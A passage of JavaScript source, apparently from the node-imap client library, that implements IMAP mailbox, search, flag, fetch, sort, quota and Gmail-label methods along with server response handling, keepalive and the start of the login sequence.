            // use UNSELECT if available, as it claims to be "cleaner" than the
            // alternative "hack"
            this._enqueue('UNSELECT', function (err) {
                if (!err)
                    self._box = undefined;

                cb(err);
            });
        } else {
            // "HACK": close the box without expunging by attempting to SELECT a
            // non-existent mailbox
            var badbox = 'NODEJSIMAPCLOSINGBOX' + Date.now();
            this._enqueue('SELECT "' + badbox + '"', function (err) {
                self._box = undefined;
                cb();
            });
        }
    }
};

Connection.prototype.addBox = function (name, cb) {
    this._enqueue('CREATE "' + escape(utf7.encode('' + name)) + '"', cb);
};

Connection.prototype.delBox = function (name, cb) {
    this._enqueue('DELETE "' + escape(utf7.encode('' + name)) + '"', cb);
};

Connection.prototype.renameBox = function (oldname, newname, cb) {
    var encoldname = escape(utf7.encode('' + oldname)),
        encnewname = escape(utf7.encode('' + newname)),
        self = this;

    this._enqueue('RENAME "' + encoldname + '" "' + encnewname + '"',
      function (err) {
          if (err)
              return cb(err);

          if (self._box
              && self._box.name === oldname
              && oldname.toUpperCase() !== 'INBOX') {
              self._box.name = newname;
              cb(err, self._box);
          } else
              cb();
      }
    );
};

Connection.prototype.subscribeBox = function (name, cb) {
    this._enqueue('SUBSCRIBE "' + escape(utf7.encode('' + name)) + '"', cb);
};

Connection.prototype.unsubscribeBox = function (name, cb) {
    this._enqueue('UNSUBSCRIBE "' + escape(utf7.encode('' + name)) + '"', cb);
};

Connection.prototype.getSubscribedBoxes = function (namespace, cb) {
    if (typeof namespace === 'function') {
        cb = namespace;
        namespace = '';
    }

    namespace = escape(utf7.encode('' + namespace));

    this._enqueue('LSUB "' + namespace + '" "*"', cb);
};

Connection.prototype.status = function (boxName, cb) {
    if (this._box && this._box.name === boxName)
        throw new Error('Cannot call status on currently selected mailbox');

    boxName = escape(utf7.encode('' + boxName));

    var info = ['MESSAGES', 'RECENT', 'UNSEEN', 'UIDVALIDITY', 'UIDNEXT'];

    if (this.serverSupports('CONDSTORE'))
        info.push('HIGHESTMODSEQ');

    info = info.join(' ');

    this._enqueue('STATUS "' + boxName + '" (' + info + ')', cb);
};

Connection.prototype.expunge = function (uids, cb) {
    if (typeof uids === 'function') {
        cb = uids;
        uids = undefined;
    }

    if (uids !== undefined) {
        if (!Array.isArray(uids))
            uids = [uids];
        validateUIDList(uids);

        if (uids.length === 0)
            return cb(new Error('Empty uid list'))

        uids = uids.join(',');

        if (!this.serverSupports('UIDPLUS'))
            return cb(new Error('Server does not support this feature (UIDPLUS)'));

        this._enqueue('UID EXPUNGE ' + uids, cb);
    } else
        this._enqueue('EXPUNGE', cb);
};

Connection.prototype.search = function (criteria, cb) {
    this._search('UID ', criteria, cb);
};

Connection.prototype._search = function (which, criteria, cb) {
    if (this._box === undefined)
        throw new Error('No mailbox is currently selected');
    else if (!Array.isArray(criteria))
        throw new Error('Expected array for search criteria');

    var cmd = which + 'SEARCH',
        info = { hasUTF8: false /*output*/ },
        query = buildSearchQuery(criteria, this._caps, info),
        lines;
    if (info.hasUTF8) {
        cmd += ' CHARSET UTF-8';
        lines = query.split(CRLF);
        query = lines.shift();
    }
    cmd += query;
    this._enqueue(cmd, cb);
    if (info.hasUTF8) {
        var req = this._queue[this._queue.length - 1];
        req.lines = lines;
    }
};

Connection.prototype.addFlags = function (uids, flags, cb) {
    this._store('UID ', uids, { mode: '+', flags: flags }, cb);
};

Connection.prototype.delFlags = function (uids, flags, cb) {
    this._store('UID ', uids, { mode: '-', flags: flags }, cb);
};

Connection.prototype.setFlags = function (uids, flags, cb) {
    this._store('UID ', uids, { mode: '', flags: flags }, cb);
};

Connection.prototype.addKeywords = function (uids, keywords, cb) {
    this._store('UID ', uids, { mode: '+', keywords: keywords }, cb);
};

Connection.prototype.delKeywords = function (uids, keywords, cb) {
    this._store('UID ', uids, { mode: '-', keywords: keywords }, cb);
};

Connection.prototype.setKeywords = function (uids, keywords, cb) {
    this._store('UID ', uids, { mode: '', keywords: keywords }, cb);
};

Connection.prototype._store = function (which, uids, cfg, cb) {
    var mode = cfg.mode,
        isFlags = (cfg.flags !== undefined),
        items = (isFlags ? cfg.flags : cfg.keywords);
    if (this._box === undefined)
        throw new Error('No mailbox is currently selected');
    else if (uids === undefined)
        throw new Error('No messages specified');

    if (!Array.isArray(uids))
        uids = [uids];
    validateUIDList(uids);

    if (uids.length === 0) {
        throw new Error('Empty '
                        + (which === '' ? 'sequence number' : 'uid')
                        + 'list');
    }

    if ((!Array.isArray(items) && typeof items !== 'string')
        || (Array.isArray(items) && items.length === 0))
        throw new Error((isFlags ? 'Flags' : 'Keywords')
                        + ' argument must be a string or a non-empty Array');
    if (!Array.isArray(items))
        items = [items];
    for (var i = 0, len = items.length; i < len; ++i) {
        if (isFlags) {
            if (items[i][0] !== '\\')
                items[i] = '\\' + items[i];
        } else {
            // keyword contains any char except control characters (%x00-1F and %x7F)
            // and: '(', ')', '{', ' ', '%', '*', '\', '"', ']'
            if (RE_INVALID_KW_CHARS.test(items[i])) {
                throw new Error('The keyword "' + items[i]
                                + '" contains invalid characters');
            }
        }
    }

    items = items.join(' ');
    uids = uids.join(',');

    var modifiers = '';
    if (cfg.modseq !== undefined && !this._box.nomodseq)
        modifiers += 'UNCHANGEDSINCE ' + cfg.modseq + ' ';

    this._enqueue(which + 'STORE ' + uids + ' '
                  + modifiers
                  + mode + 'FLAGS.SILENT (' + items + ')', cb);
};

Connection.prototype.copy = function (uids, boxTo, cb) {
    this._copy('UID ', uids, boxTo, cb);
};

Connection.prototype._copy = function (which, uids, boxTo, cb) {
    if (this._box === undefined)
        throw new Error('No mailbox is currently selected');

    if (!Array.isArray(uids))
        uids = [uids];
    validateUIDList(uids);

    if (uids.length === 0) {
        throw new Error('Empty '
                        + (which === '' ? 'sequence number' : 'uid')
                        + 'list');
    }

    boxTo = escape(utf7.encode('' + boxTo));

    this._enqueue(which + 'COPY ' + uids.join(',') + ' "' + boxTo + '"', cb);
};

Connection.prototype.move = function (uids, boxTo, cb) {
    this._move('UID ', uids, boxTo, cb);
};

Connection.prototype._move = function (which, uids, boxTo, cb) {
    if (this._box === undefined)
        throw new Error('No mailbox is currently selected');

    if (this.serverSupports('MOVE')) {
        if (!Array.isArray(uids))
            uids = [uids];
        validateUIDList(uids);

        if (uids.length === 0) {
            throw new Error('Empty '
                            + (which === '' ? 'sequence number' : 'uid')
                            + 'list');
        }

        uids = uids.join(',');
        boxTo = escape(utf7.encode('' + boxTo));

        this._enqueue(which + 'MOVE ' + uids + ' "' + boxTo + '"', cb);
    } else if (this._box.permFlags.indexOf('\\Deleted') === -1
               && this._box.flags.indexOf('\\Deleted') === -1) {
        throw new Error('Cannot move message: '
                        + 'server does not allow deletion of messages');
    } else {
        var deletedUIDs, task = 0, self = this;
        this._copy(which, uids, boxTo, function ccb(err, info) {
            if (err)
                return cb(err, info);

            if (task === 0 && which && self.serverSupports('UIDPLUS')) {
                // UIDPLUS gives us a 'UID EXPUNGE n' command to expunge a subset of
                // messages with the \Deleted flag set. This allows us to skip some
                // actions.
                task = 2;
            }
            // Make sure we don't expunge any messages marked as Deleted except the
            // one we are moving
            if (task === 0) {
                self.search(['DELETED'], function (e, result) {
                    ++task;
                    deletedUIDs = result;
                    ccb(e, info);
                });
            } else if (task === 1) {
                if (deletedUIDs.length) {
                    self.delFlags(deletedUIDs, '\\Deleted', function (e) {
                        ++task;
                        ccb(e, info);
                    });
                } else {
                    ++task;
                    ccb(err, info);
                }
            } else if (task === 2) {
                var cbMarkDel = function (e) {
                    ++task;
                    ccb(e, info);
                };
                if (which)
                    self.addFlags(uids, '\\Deleted', cbMarkDel);
                else
                    self.seq.addFlags(uids, '\\Deleted', cbMarkDel);
            } else if (task === 3) {
                if (which && self.serverSupports('UIDPLUS')) {
                    self.expunge(uids, function (e) {
                        cb(e, info);
                    });
                } else {
                    self.expunge(function (e) {
                        ++task;
                        ccb(e, info);
                    });
                }
            } else if (task === 4) {
                if (deletedUIDs.length) {
                    self.addFlags(deletedUIDs, '\\Deleted', function (e) {
                        cb(e, info);
                    });
                } else
                    cb(err, info);
            }
        });
    }
};

Connection.prototype.fetch = function (uids, options) {
    return this._fetch('UID ', uids, options);
};

Connection.prototype._fetch = function (which, uids, options) {
    if (uids === undefined
        || uids === null
        || (Array.isArray(uids) && uids.length === 0))
        throw new Error('Nothing to fetch');

    if (!Array.isArray(uids))
        uids = [uids];
    validateUIDList(uids);

    if (uids.length === 0) {
        throw new Error('Empty '
                        + (which === '' ? 'sequence number' : 'uid')
                        + 'list');
    }

    uids = uids.join(',');

    var cmd = which + 'FETCH ' + uids + ' (',
        fetching = [],
        i, len, key;

    if (this.serverSupports('X-GM-EXT-1')) {
        fetching.push('X-GM-THRID');
        fetching.push('X-GM-MSGID');
        fetching.push('X-GM-LABELS');
    }
    if (this.serverSupports('CONDSTORE') && !this._box.nomodseq)
        fetching.push('MODSEQ');

    fetching.push('UID');
    fetching.push('FLAGS');
    fetching.push('INTERNALDATE');

    var modifiers;

    if (options) {
        modifiers = options.modifiers;
        if (options.envelope)
            fetching.push('ENVELOPE');
        if (options.struct)
            fetching.push('BODYSTRUCTURE');
        if (options.size)
            fetching.push('RFC822.SIZE');
        cmd += fetching.join(' ');
        if (options.bodies !== undefined) {
            var bodies = options.bodies,
                prefix = (options.markSeen ? '' : '.PEEK');
            if (!Array.isArray(bodies))
                bodies = [bodies];
            for (i = 0, len = bodies.length; i < len; ++i) {
                fetching.push(parseExpr('' + bodies[i]));
                cmd += ' BODY' + prefix + '[' + bodies[i] + ']';
            }
        }
    } else
        cmd += fetching.join(' ');

    cmd += ')';

    var modkeys = (typeof modifiers === 'object' ? Object.keys(modifiers) : []),
        modstr = ' (';
    for (i = 0, len = modkeys.length, key; i < len; ++i) {
        key = modkeys[i].toUpperCase();
        if (key === 'CHANGEDSINCE' && this.serverSupports('CONDSTORE')
            && !this._box.nomodseq)
            modstr += key + ' ' + modifiers[modkeys[i]] + ' ';
    }
    if (modstr.length > 2) {
        cmd += modstr.substring(0, modstr.length - 1);
        cmd += ')';
    }

    this._enqueue(cmd);
    var req = this._queue[this._queue.length - 1];
    req.fetchCache = {};
    req.fetching = fetching;
    return (req.bodyEmitter = new EventEmitter());
};

// Extension methods ===========================================================
Connection.prototype.setLabels = function (uids, labels, cb) {
    this._storeLabels('UID ', uids, labels, '', cb);
};

Connection.prototype.addLabels = function (uids, labels, cb) {
    this._storeLabels('UID ', uids, labels, '+', cb);
};

Connection.prototype.delLabels = function (uids, labels, cb) {
    this._storeLabels('UID ', uids, labels, '-', cb);
};

Connection.prototype._storeLabels = function (which, uids, labels, mode, cb) {
    if (!this.serverSupports('X-GM-EXT-1'))
        throw new Error('Server must support X-GM-EXT-1 capability');
    else if (this._box === undefined)
        throw new Error('No mailbox is currently selected');
    else if (uids === undefined)
        throw new Error('No messages specified');

    if (!Array.isArray(uids))
        uids = [uids];
    validateUIDList(uids);

    if (uids.length === 0) {
        throw new Error('Empty '
                        + (which === '' ? 'sequence number' : 'uid')
                        + 'list');
    }

    if ((!Array.isArray(labels) && typeof labels !== 'string')
        || (Array.isArray(labels) && labels.length === 0))
        throw new Error('labels argument must be a string or a non-empty Array');

    if (!Array.isArray(labels))
        labels = [labels];
    labels = labels.map(function (v) {
        return '"' + escape(utf7.encode('' + v)) + '"';
    }).join(' ');

    uids = uids.join(',');

    this._enqueue(which + 'STORE ' + uids + ' ' + mode
                  + 'X-GM-LABELS.SILENT (' + labels + ')', cb);
};

Connection.prototype.sort = function (sorts, criteria, cb) {
    this._sort('UID ', sorts, criteria, cb);
};

Connection.prototype._sort = function (which, sorts, criteria, cb) {
    if (this._box === undefined)
        throw new Error('No mailbox is currently selected');
    else if (!Array.isArray(sorts) || !sorts.length)
        throw new Error('Expected array with at least one sort criteria');
    else if (!Array.isArray(criteria))
        throw new Error('Expected array for search criteria');
    else if (!this.serverSupports('SORT'))
        throw new Error('Sort is not supported on the server');

    sorts = sorts.map(function (c) {
        if (typeof c !== 'string')
            throw new Error('Unexpected sort criteria data type. '
                            + 'Expected string. Got: ' + typeof criteria);

        var modifier = '';
        if (c[0] === '-') {
            modifier = 'REVERSE ';
            c = c.substring(1);
        }
        switch (c.toUpperCase()) {
            case 'ARRIVAL':
            case 'CC':
            case 'DATE':
            case 'FROM':
            case 'SIZE':
            case 'SUBJECT':
            case 'TO':
                break;
            default:
                throw new Error('Unexpected sort criteria: ' + c);
        }

        return modifier + c;
    });

    sorts = sorts.join(' ');

    var info = { hasUTF8: false /*output*/ },
        query = buildSearchQuery(criteria, this._caps, info),
        charset = 'US-ASCII',
        lines;
    if (info.hasUTF8) {
        charset = 'UTF-8';
        lines = query.split(CRLF);
        query = lines.shift();
    }

    this._enqueue(which + 'SORT (' + sorts + ') ' + charset + query, cb);
    if (info.hasUTF8) {
        var req = this._queue[this._queue.length - 1];
        req.lines = lines;
    }
};

Connection.prototype.esearch = function (criteria, options, cb) {
    this._esearch('UID ', criteria, options, cb);
};

Connection.prototype._esearch = function (which, criteria, options, cb) {
    if (this._box === undefined)
        throw new Error('No mailbox is currently selected');
    else if (!Array.isArray(criteria))
        throw new Error('Expected array for search options');

    var info = { hasUTF8: false /*output*/ },
        query = buildSearchQuery(criteria, this._caps, info),
        charset = '',
        lines;
    if (info.hasUTF8) {
        charset = ' CHARSET UTF-8';
        lines = query.split(CRLF);
        query = lines.shift();
    }

    if (typeof options === 'function') {
        cb = options;
        options = '';
    } else if (!options)
        options = '';

    if (Array.isArray(options))
        options = options.join(' ');

    this._enqueue(which + 'SEARCH RETURN (' + options + ')' + charset + query, cb);
    if (info.hasUTF8) {
        var req = this._queue[this._queue.length - 1];
        req.lines = lines;
    }
};

Connection.prototype.setQuota = function (quotaRoot, limits, cb) {
    if (typeof limits === 'function') {
        cb = limits;
        limits = {};
    }

    var triplets = '';
    for (var l in limits) {
        if (triplets)
            triplets += ' ';
        triplets += l + ' ' + limits[l];
    }

    quotaRoot = escape(utf7.encode('' + quotaRoot));

    this._enqueue('SETQUOTA "' + quotaRoot + '" (' + triplets + ')',
      function (err, quotalist) {
          if (err)
              return cb(err);

          cb(err, quotalist ? quotalist[0] : limits);
      }
    );
};

Connection.prototype.getQuota = function (quotaRoot, cb) {
    quotaRoot = escape(utf7.encode('' + quotaRoot));

    this._enqueue('GETQUOTA "' + quotaRoot + '"', function (err, quotalist) {
        if (err)
            return cb(err);

        cb(err, quotalist[0]);
    });
};

Connection.prototype.getQuotaRoot = function (boxName, cb) {
    boxName = escape(utf7.encode('' + boxName));

    this._enqueue('GETQUOTAROOT "' + boxName + '"', function (err, quotalist) {
        if (err)
            return cb(err);

        var quotas = {};
        if (quotalist) {
            for (var i = 0, len = quotalist.length; i < len; ++i)
                quotas[quotalist[i].root] = quotalist[i].resources;
        }

        cb(err, quotas);
    });
};

Connection.prototype.thread = function (algorithm, criteria, cb) {
    this._thread('UID ', algorithm, criteria, cb);
};

Connection.prototype._thread = function (which, algorithm, criteria, cb) {
    algorithm = algorithm.toUpperCase();

    if (!this.serverSupports('THREAD=' + algorithm))
        throw new Error('Server does not support that threading algorithm');

    var info = { hasUTF8: false /*output*/ },
        query = buildSearchQuery(criteria, this._caps, info),
        charset = 'US-ASCII',
        lines;
    if (info.hasUTF8) {
        charset = 'UTF-8';
        lines = query.split(CRLF);
        query = lines.shift();
    }

    this._enqueue(which + 'THREAD ' + algorithm + ' ' + charset + query, cb);
    if (info.hasUTF8) {
        var req = this._queue[this._queue.length - 1];
        req.lines = lines;
    }
};

Connection.prototype.addFlagsSince = function (uids, flags, modseq, cb) {
    this._store('UID ',
                uids,
                { mode: '+', flags: flags, modseq: modseq },
                cb);
};

Connection.prototype.delFlagsSince = function (uids, flags, modseq, cb) {
    this._store('UID ',
                uids,
                { mode: '-', flags: flags, modseq: modseq },
                cb);
};

Connection.prototype.setFlagsSince = function (uids, flags, modseq, cb) {
    this._store('UID ',
                uids,
                { mode: '', flags: flags, modseq: modseq },
                cb);
};

Connection.prototype.addKeywordsSince = function (uids, keywords, modseq, cb) {
    this._store('UID ',
                uids,
                { mode: '+', keywords: keywords, modseq: modseq },
                cb);
};

Connection.prototype.delKeywordsSince = function (uids, keywords, modseq, cb) {
    this._store('UID ',
                uids,
                { mode: '-', keywords: keywords, modseq: modseq },
                cb);
};

Connection.prototype.setKeywordsSince = function (uids, keywords, modseq, cb) {
    this._store('UID ',
                uids,
                { mode: '', keywords: keywords, modseq: modseq },
                cb);
};
// END Extension methods =======================================================

// Namespace for seqno-based commands
Connection.prototype.__defineGetter__('seq', function () {
    var self = this;
    return {
        delKeywords: function (seqnos, keywords, cb) {
            self._store('', seqnos, { mode: '-', keywords: keywords }, cb);
        },
        addKeywords: function (seqnos, keywords, cb) {
            self._store('', seqnos, { mode: '+', keywords: keywords }, cb);
        },
        setKeywords: function (seqnos, keywords, cb) {
            self._store('', seqnos, { mode: '', keywords: keywords }, cb);
        },

        delFlags: function (seqnos, flags, cb) {
            self._store('', seqnos, { mode: '-', flags: flags }, cb);
        },
        addFlags: function (seqnos, flags, cb) {
            self._store('', seqnos, { mode: '+', flags: flags }, cb);
        },
        setFlags: function (seqnos, flags, cb) {
            self._store('', seqnos, { mode: '', flags: flags }, cb);
        },

        move: function (seqnos, boxTo, cb) {
            self._move('', seqnos, boxTo, cb);
        },
        copy: function (seqnos, boxTo, cb) {
            self._copy('', seqnos, boxTo, cb);
        },
        fetch: function (seqnos, options) {
            return self._fetch('', seqnos, options);
        },
        search: function (options, cb) {
            self._search('', options, cb);
        },

        // Extensions ==============================================================
        delLabels: function (seqnos, labels, cb) {
            self._storeLabels('', seqnos, labels, '-', cb);
        },
        addLabels: function (seqnos, labels, cb) {
            self._storeLabels('', seqnos, labels, '+', cb);
        },
        setLabels: function (seqnos, labels, cb) {
            self._storeLabels('', seqnos, labels, '', cb);
        },

        esearch: function (criteria, options, cb) {
            self._esearch('', criteria, options, cb);
        },

        sort: function (sorts, options, cb) {
            self._sort('', sorts, options, cb);
        },
        thread: function (algorithm, criteria, cb) {
            self._thread('', algorithm, criteria, cb);
        },

        delKeywordsSince: function (seqnos, keywords, modseq, cb) {
            self._store('',
                        seqnos,
                        { mode: '-', keywords: keywords, modseq: modseq },
                        cb);
        },
        addKeywordsSince: function (seqnos, keywords, modseq, cb) {
            self._store('',
                        seqnos,
                        { mode: '+', keywords: keywords, modseq: modseq },
                        cb);
        },
        setKeywordsSince: function (seqnos, keywords, modseq, cb) {
            self._store('',
                        seqnos,
                        { mode: '', keywords: keywords, modseq: modseq },
                        cb);
        },

        delFlagsSince: function (seqnos, flags, modseq, cb) {
            self._store('',
                        seqnos,
                        { mode: '-', flags: flags, modseq: modseq },
                        cb);
        },
        addFlagsSince: function (seqnos, flags, modseq, cb) {
            self._store('',
                        seqnos,
                        { mode: '+', flags: flags, modseq: modseq },
                        cb);
        },
        setFlagsSince: function (seqnos, flags, modseq, cb) {
            self._store('',
                        seqnos,
                        { mode: '', flags: flags, modseq: modseq },
                        cb);
        }
    };
});

Connection.prototype._resUntagged = function (info) {
    var type = info.type, i, len, box, attrs, key;

    if (type === 'bye')
        this._sock.end();
    else if (type === 'namespace')
        this.namespaces = info.text;
    else if (type === 'id')
        this._curReq.cbargs.push(info.text);
    else if (type === 'capability')
        this._caps = info.text.map(function (v) { return v.toUpperCase(); });
    else if (type === 'preauth')
        this.state = 'authenticated';
    else if (type === 'sort' || type === 'thread' || type === 'esearch')
        this._curReq.cbargs.push(info.text);
    else if (type === 'search') {
        if (info.text.results !== undefined) {
            // CONDSTORE-modified search results
            this._curReq.cbargs.push(info.text.results);
            this._curReq.cbargs.push(info.text.modseq);
        } else
            this._curReq.cbargs.push(info.text);
    } else if (type === 'quota') {
        var cbargs = this._curReq.cbargs;
        if (!cbargs.length)
            cbargs.push([]);
        cbargs[0].push(info.text);
    } else if (type === 'recent') {
        if (!this._box && RE_OPENBOX.test(this._curReq.type))
            this._createCurrentBox();
        if (this._box)
            this._box.messages.new = info.num;
    } else if (type === 'flags') {
        if (!this._box && RE_OPENBOX.test(this._curReq.type))
            this._createCurrentBox();
        if (this._box)
            this._box.flags = info.text;
    } else if (type === 'bad' || type === 'no') {
        if (this.state === 'connected' && !this._curReq) {
            clearTimeout(this._tmrConn);
            clearTimeout(this._tmrAuth);
            var err = new Error('Received negative welcome: ' + info.text);
            err.source = 'protocol';
            this.emit('error', err);
            this._sock.end();
        }
    } else if (type === 'exists') {
        if (!this._box && RE_OPENBOX.test(this._curReq.type))
            this._createCurrentBox();
        if (this._box) {
            var prev = this._box.messages.total,
                now = info.num;
            this._box.messages.total = now;
            if (now > prev && this.state === 'authenticated') {
                this._box.messages.new = now - prev;
                this.emit('mail', this._box.messages.new);
            }
        }
    } else if (type === 'expunge') {
        if (this._box) {
            if (this._box.messages.total > 0)
                --this._box.messages.total;
            this.emit('expunge', info.num);
        }
    } else if (type === 'ok') {
        if (this.state === 'connected' && !this._curReq)
            this._login();
        else if (typeof info.textCode === 'string'
                 && info.textCode.toUpperCase() === 'ALERT')
            this.emit('alert', info.text);
        else if (this._curReq
                 && info.textCode
                 && (RE_OPENBOX.test(this._curReq.type))) {
            // we're opening a mailbox

            if (!this._box)
                this._createCurrentBox();

            if (info.textCode.key)
                key = info.textCode.key.toUpperCase();
            else
                key = info.textCode;

            if (key === 'UIDVALIDITY')
                this._box.uidvalidity = info.textCode.val;
            else if (key === 'UIDNEXT')
                this._box.uidnext = info.textCode.val;
            else if (key === 'HIGHESTMODSEQ')
                this._box.highestmodseq = '' + info.textCode.val;
            else if (key === 'PERMANENTFLAGS') {
                var idx, permFlags, keywords;
                this._box.permFlags = permFlags = info.textCode.val;
                if ((idx = this._box.permFlags.indexOf('\\*')) > -1) {
                    this._box.newKeywords = true;
                    permFlags.splice(idx, 1);
                }
                this._box.keywords = keywords = permFlags.filter(function (f) {
                    return (f[0] !== '\\');
                });
                for (i = 0, len = keywords.length; i < len; ++i)
                    permFlags.splice(permFlags.indexOf(keywords[i]), 1);
            } else if (key === 'UIDNOTSTICKY')
                this._box.persistentUIDs = false;
            else if (key === 'NOMODSEQ')
                this._box.nomodseq = true;
        } else if (typeof info.textCode === 'string'
                   && info.textCode.toUpperCase() === 'UIDVALIDITY')
            this.emit('uidvalidity', info.text);
    } else if (type === 'list' || type === 'lsub') {
        if (this.delimiter === undefined)
            this.delimiter = info.text.delimiter;
        else {
            if (this._curReq.cbargs.length === 0)
                this._curReq.cbargs.push({});

            box = {
                attribs: info.text.flags,
                delimiter: info.text.delimiter,
                children: null,
                parent: null
            };

            for (i = 0, len = SPECIAL_USE_ATTRIBUTES.length; i < len; ++i)
                if (box.attribs.indexOf(SPECIAL_USE_ATTRIBUTES[i]) > -1)
                    box.special_use_attrib = SPECIAL_USE_ATTRIBUTES[i];

            var name = info.text.name,
                curChildren = this._curReq.cbargs[0];

            if (box.delimiter) {
                var path = name.split(box.delimiter),
                    parent = null;
                name = path.pop();
                for (i = 0, len = path.length; i < len; ++i) {
                    if (!curChildren[path[i]])
                        curChildren[path[i]] = {};
                    if (!curChildren[path[i]].children)
                        curChildren[path[i]].children = {};
                    parent = curChildren[path[i]];
                    curChildren = curChildren[path[i]].children;
                }
                box.parent = parent;
            }
            if (curChildren[name])
                box.children = curChildren[name].children;
            curChildren[name] = box;
        }
    } else if (type === 'status') {
        box = {
            name: info.text.name,
            uidnext: 0,
            uidvalidity: 0,
            messages: {
                total: 0,
                new: 0,
                unseen: 0
            }
        };
        attrs = info.text.attrs;

        if (attrs) {
            if (attrs.recent !== undefined)
                box.messages.new = attrs.recent;
            if (attrs.unseen !== undefined)
                box.messages.unseen = attrs.unseen;
            if (attrs.messages !== undefined)
                box.messages.total = attrs.messages;
            if (attrs.uidnext !== undefined)
                box.uidnext = attrs.uidnext;
            if (attrs.uidvalidity !== undefined)
                box.uidvalidity = attrs.uidvalidity;
            if (attrs.highestmodseq !== undefined) // CONDSTORE
                box.highestmodseq = '' + attrs.highestmodseq;
        }
        this._curReq.cbargs.push(box);
    } else if (type === 'fetch') {
        if (/^(?:UID )?FETCH/.test(this._curReq.fullcmd)) {
            // FETCH response sent as result of FETCH request
            var msg = this._curReq.fetchCache[info.num],
                keys = Object.keys(info.text),
                keyslen = keys.length,
                toget, msgEmitter, j;

            if (msg === undefined) {
                // simple case -- no bodies were streamed
                toget = this._curReq.fetching.slice(0);
                if (toget.length === 0)
                    return;

                msgEmitter = new EventEmitter();
                attrs = {};

                this._curReq.bodyEmitter.emit('message', msgEmitter, info.num);
            } else {
                toget = msg.toget;
                msgEmitter = msg.msgEmitter;
                attrs = msg.attrs;
            }

            i = toget.length;
            if (i === 0) {
                if (msg && !msg.ended) {
                    msg.ended = true;
                    process.nextTick(function () {
                        msgEmitter.emit('end');
                    });
                }
                return;
            }

            if (keyslen > 0) {
                while (--i >= 0) {
                    j = keyslen;
                    while (--j >= 0) {
                        if (keys[j].toUpperCase() === toget[i]) {
                            if (!RE_BODYPART.test(toget[i])) {
                                if (toget[i] === 'X-GM-LABELS') {
                                    var labels = info.text[keys[j]];
                                    for (var k = 0, lenk = labels.length; k < lenk; ++k)
                                        labels[k] = ('' + labels[k]).replace(RE_ESCAPE, '\\');
                                }
                                key = FETCH_ATTR_MAP[toget[i]];
                                if (!key)
                                    key = toget[i].toLowerCase();
                                attrs[key] = info.text[keys[j]];
                            }
                            toget.splice(i, 1);
                            break;
                        }
                    }
                }
            }

            if (toget.length === 0) {
                if (msg)
                    msg.ended = true;
                process.nextTick(function () {
                    msgEmitter.emit('attributes', attrs);
                    msgEmitter.emit('end');
                });
            } else if (msg === undefined) {
                this._curReq.fetchCache[info.num] = {
                    msgEmitter: msgEmitter,
                    toget: toget,
                    attrs: attrs,
                    ended: false
                };
            }
        } else {
            // FETCH response sent as result of STORE request or sent unilaterally,
            // treat them as the same for now for simplicity
            this.emit('update', info.num, info.text);
        }
    }
};

Connection.prototype._resTagged = function (info) {
    var req = this._curReq, err;

    this._curReq = undefined;

    if (info.type === 'no' || info.type === 'bad') {
        var errtext;
        if (info.text)
            errtext = info.text;
        else
            errtext = req.oauthError;
        err = new Error(errtext);
        err.type = info.type;
        err.textCode = info.textCode;
        err.source = 'protocol';
    } else if (this._box) {
        if (req.type === 'EXAMINE' || req.type === 'SELECT') {
            this._box.readOnly = (typeof info.textCode === 'string'
                                  && info.textCode.toUpperCase() === 'READ-ONLY');
        }

        // According to RFC 3501, UID commands do not give errors for
        // non-existant user-supplied UIDs, so give the callback empty results
        // if we unexpectedly received no untagged responses.
        if (RE_UIDCMD_HASRESULTS.test(req.fullcmd) && req.cbargs.length === 0)
            req.cbargs.push([]);
    }

    if (req.bodyEmitter) {
        var bodyEmitter = req.bodyEmitter;
        if (err)
            bodyEmitter.emit('error', err);
        process.nextTick(function () {
            bodyEmitter.emit('end');
        });
    } else {
        req.cbargs.unshift(err);
        if (info.textCode && info.textCode.key) {
            var key = info.textCode.key.toUpperCase();
            if (key === 'APPENDUID') // [uidvalidity, newUID]
                req.cbargs.push(info.textCode.val[1]);
            else if (key === 'COPYUID') // [uidvalidity, sourceUIDs, destUIDs]
                req.cbargs.push(info.textCode.val[2]);
        }
        req.cb && req.cb.apply(this, req.cbargs);
    }

    if (this._queue.length === 0
        && this._config.keepalive
        && this.state === 'authenticated'
        && !this._idle.enabled) {
        this._idle.enabled = true;
        this._doKeepaliveTimer(true);
    }

    this._processQueue();
};

Connection.prototype._createCurrentBox = function () {
    this._box = {
        name: '',
        flags: [],
        readOnly: false,
        uidvalidity: 0,
        uidnext: 0,
        permFlags: [],
        keywords: [],
        newKeywords: false,
        persistentUIDs: true,
        nomodseq: false,
        messages: {
            total: 0,
            new: 0
        }
    };
};

Connection.prototype._doKeepaliveTimer = function (immediate) {
    var self = this,
        interval = this._config.keepalive.interval || KEEPALIVE_INTERVAL,
        idleWait = this._config.keepalive.idleInterval || MAX_IDLE_WAIT,
        forceNoop = this._config.keepalive.forceNoop || false,
        timerfn = function () {
            if (self._idle.enabled) {
                // unlike NOOP, IDLE is only a valid command after authenticating
                if (!self.serverSupports('IDLE')
                    || self.state !== 'authenticated'
                    || forceNoop)
                    self._enqueue('NOOP', true);
                else {
                    if (self._idle.started === undefined) {
                        self._idle.started = 0;
                        self._enqueue('IDLE', true);
                    } else if (self._idle.started > 0) {
                        var timeDiff = Date.now() - self._idle.started;
                        if (timeDiff >= idleWait) {
                            self._idle.enabled = false;
                            self.debug && self.debug('=> DONE');
                            self._sock.write('DONE' + CRLF);
                            return;
                        }
                    }
                    self._tmrKeepalive = setTimeout(timerfn, interval);
                }
            }
        };

    if (immediate)
        timerfn();
    else
        this._tmrKeepalive = setTimeout(timerfn, interval);
};

Connection.prototype._login = function () {
    var self = this, checkedNS = false;

    var reentry = function (err) {
        clearTimeout(self._tmrAuth);
        if (err) {
            self.emit('error', err);
            return self._sock.end();
        }

        // 2. Get the list of available namespaces (RFC2342)
        if (!checkedNS && self.serverSupports('NAMESPACE')) {
            checkedNS = true;
            return self._enqueue('NAMESPACE', reentry);
        }

        // 3. Get the top-level mailbox hierarchy delimiter used by the server
        self._enqueue('LIST "" ""', function () {
            self.state = 'authenticated';
            self.emit('ready');
        });
    };

    // 1. Get the supported capabilities
    self._enqueue('CAPABILITY', function () {
        // No need to attempt the login sequence if we're on a PREAUTH connection.
        if (self.state === 'connected') {
            var err,
                checkCaps = function (error) {
                    if (error) {
                        error.source = 'authentication';
                        return reentry(error);
                    }

                    if (self._caps === undefined) {
                        // Fetch server capabilities if they were not automatically
                        // provided after authentication
                        return self._enqueue('CAPABILITY', reentry);
                    } else
                        reentry();
                };

            if (self.serverSupports('STARTTLS')
                && (self._config.autotls === 'always'
                    || (self._config.autotls === 'required'
                        && self.serverSupports('LOGINDISABLED')))) {
